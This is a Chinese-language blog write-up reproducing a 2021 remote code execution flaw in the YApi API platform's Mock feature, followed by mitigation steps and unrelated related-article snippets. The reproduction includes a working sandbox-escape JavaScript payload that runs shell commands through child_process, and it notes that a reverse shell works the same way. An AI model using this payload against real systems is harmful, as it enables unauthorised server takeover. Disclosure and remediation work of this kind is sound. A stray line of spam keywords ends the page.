<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    YApi Mock功能遠程代碼執行漏洞復現

    VSole2021-07-16 09:04:08

    0x01 簡介

    YApi 是高效、易用、功能強大的 api 管理平臺是國內某旅行網站的大前端技術中心開源項目,使用mock數據/腳本作為中間交互層,為前端后臺開發與測試人員提供更優雅的接口管理服務,該系統被國內較多知名互聯網企業所采用。

    0x02 漏洞概述

    近日,網絡上爆出 YApi 的遠程代碼執行 0day 漏洞,漏洞等級為高危,且正被廣泛利用。攻擊者通過注冊用戶后,即可通過Mock功能遠程執行任意代碼。

    因為大量用戶使用YApi的默認配置并允許從外部網絡訪問YApi服務,導致攻擊者注冊用戶后,即可通過 Mock功能遠程執行任意代碼。

    0x03 影響版本

    YApi7月7日前版本

    0x04 環境搭建

    docker部署:

    https://github.com/Ryan-Miao/docker-yapi
    

    0x05 漏洞復現

    1.注冊用戶

    2.添加項目

    訪問/add-project

    3.添加接口

    4.設置mock

    const sandbox = this
    
    const ObjectConstructor = this.constructor
    
    const FunctionConstructor = ObjectConstructor.constructor
    
    const myfun = FunctionConstructor('return process')
    
    const process = myfun()
    
    mockJson = process.mainModule.require("child_process").execSync("ifconfig").toString()
    

    5.查看Mock地址

    6.訪問Mock地址

    命令成功執行:


    7.同理,也可利用命令反彈shell

    0x06 修復方式

    1、關閉YApi用戶注冊功能;修改完成后,重啟YApi服務

    在"config.json"添加"closeRegister:true"配置項:
    {
      "port": "*****",
      "closeRegister":true
    }
    

    2、暫時關閉mock功能(需要修改YApi代碼)

    在"config.json"中添加"mock: false";

    "exts/yapi-plugin-andvanced-mock/server.js"中找到

    if (caseData&&caseData.case_enable{...}
    

    在其上方添加

    if(!yapi.WEBCONFIG.mock) {return false;}
    

    3、白名單限制;

    安全組配置白名單訪問,或者使用NGINX進行代理,限制白名單IP訪問;

    4、檢查用戶列表,刪除惡意不明用戶;并刪除惡意不明用戶創建的接口及mock腳本。

    遠程代碼執行漏洞mock
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    YApi 是高效、易用、功能強大的 api 管理平臺是國內某旅行網站的大前端技術中心開源項目,使用mock數據/腳本作為中間交互層,為前端后臺開發與測試人員提供更優雅的接口管理服務,該系統被國內較多知名互聯網企業所采用。
    YApi接口管理平臺遠程代碼執行0day漏洞,攻擊者可通過平臺注冊用戶添加接口,設置mock腳本從而執行任意代碼。
    Laravel官方發布安全通告,修復了一個存在于Laravel中的遠程代碼執行漏洞漏洞編號:CVE-2021-43503,漏洞威脅等級:嚴重,漏洞評分:9.8。
    ?云安全風險情報
    2023-09-26 13:48:20
    當前各行業基礎設施和服務向云逐漸遷移,隨之而來針對云上資產的攻擊也不斷出現,掌握云上風險態勢成為企業安全的重要環節。騰訊安全基于云原生安全體系,通過實時監測各類針對云上資產的攻擊行為,持續感知在野攻擊情況。經過安全專家的分析和挖掘,漏洞是攻擊鏈上的重要一環,既能看到“老而彌新”漏洞的自動化批量攻擊,也可發現新曝光漏洞開始迅速武器化,此外還涉及一些尚未公開的潛在風險被攻擊者利用。
    筆者片面的從多年乙方經驗(不涉及監管層面能拿到的數據)的技術層面來討論下大攻防演練多人運動下的溯源反制思路,以及作為反制團隊如何與藍隊其他成員之間進行配合反制相關的工作。 如有寫的不對的地方及遺漏的地方(肯定有的),請多多交流。
    鑒于該漏洞影響范圍較大,建議客戶盡快做好自查及防護。處置建議1、安全更新: 目前官方已發布安全更新,建議受影響客戶安裝更新 https://github.com/top-think/framework/releases2、自查方案: ThinkPHP 6 打開app/middleware.php 如果 \think\middleware\LoadLangPack::class 沒有注釋,代表著受此漏洞影響。
    對此,安識科技建議廣大用戶及時升級到安全版本,并做好資產自查以及預防工作,以免遭受黑客攻擊。GitLab 主要對 group 和 project 兩個維度進行代碼和文檔管理。漏洞危害 攻擊者可利用該漏洞通過 GitHub API 構造惡意數據執行遠程代碼攻擊,最終獲取服務器最高權限。解決方案 當前官方已發布最新版本,建議受影響的用戶及時更新升級到最新版本。
    鑒于該漏洞影響范圍極大,建議企業盡快做好自查及防護。
    近日,瑞星公司發布《2021年中國網絡安全報告》,該報告綜合瑞星“云安全”系
    0x01 漏洞概述IBM WebSphere Application Server在今年6月發布了一則漏洞通告,cve編號為:CVE-2020-4450。該漏洞允許攻擊者通過iiop向WAS進行網絡請求,最終在WAS上執行任意代碼。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类